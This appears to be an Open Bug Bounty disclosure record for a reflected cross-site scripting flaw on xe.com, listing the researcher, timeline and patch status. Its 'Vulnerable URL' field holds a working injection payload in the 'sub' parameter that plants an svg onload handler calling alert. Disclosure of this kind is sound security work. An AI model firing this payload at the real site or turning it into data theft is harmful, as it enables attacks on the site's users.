xe.com XSS vulnerability

2015-11-26T13:59:00
ID OBB:109308
Type openbugbounty
Reporter Lewis
Modified 2016-02-18T17:11:00

Description

Vulnerable URL:
http://www.xe.com/email/cus/cus_newsletter.php?basecur=USD&date=2009-05-20&sub=CUSD3FA4958E1E7%22%3E%3Ch1%3E@Lewis%3C/h1%3E%3Csvg/onload=window.onerror=alert;throw/x/;//
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 466
Google Pagerank| 8
VIP website status:| Yes
Check xe.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 26 November, 2015 13:59 GMT
Vulnerability existence verified and confirmed| 26 November, 2015 16:41 GMT
Vulnerability details disclosed by researcher| 18 February, 2016 17:11 GMT